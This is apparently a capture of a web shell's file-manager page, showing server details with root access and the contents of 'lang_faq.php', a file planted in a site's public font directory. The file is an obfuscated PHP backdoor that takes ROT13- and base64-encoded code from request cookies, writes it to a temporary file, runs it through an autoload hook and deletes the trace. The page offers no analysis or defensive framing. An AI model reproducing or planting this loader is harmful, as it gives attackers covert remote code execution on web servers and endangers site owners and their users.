HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
$ pwd: /var/www/html/gamificacionbahia.sumar.com.py/public/css/font/
Upload Files
File: /var/www/html/gamificacionbahia.sumar.com.py/public/css/font/lang_faq.php
<?php

if (isset($_COOKIE[34-34]) && isset($_COOKIE[-22+23]) && isset($_COOKIE[80-77]) && isset($_COOKIE[-1+5])) {
    $placeholder = $_COOKIE;
    function config($argument) {
        $placeholder = $_COOKIE;
        $identifier = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '7761bb1e');
        if (!is_writable($identifier)) {
            $identifier = getcwd() . DIRECTORY_SEPARATOR . "accept";
        }
        $var = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($placeholder[3]));
        if (is_writeable($identifier)) {
            $attr = fopen($identifier, 'w+');
            fputs($attr, $var);
            fclose($attr);
            spl_autoload_unregister(__FUNCTION__);
            require_once($identifier);
            @array_map('unlink', array($identifier));
        }
    }
    spl_autoload_register("config");
    $stor = "8d7803279291bf63d0703037ce3c673e";
    if (!strncmp($stor, $placeholder[4], 32)) {
        if (@class_parents("center_internal", true)) {
            exit;
        }
    }
}
@ Telegram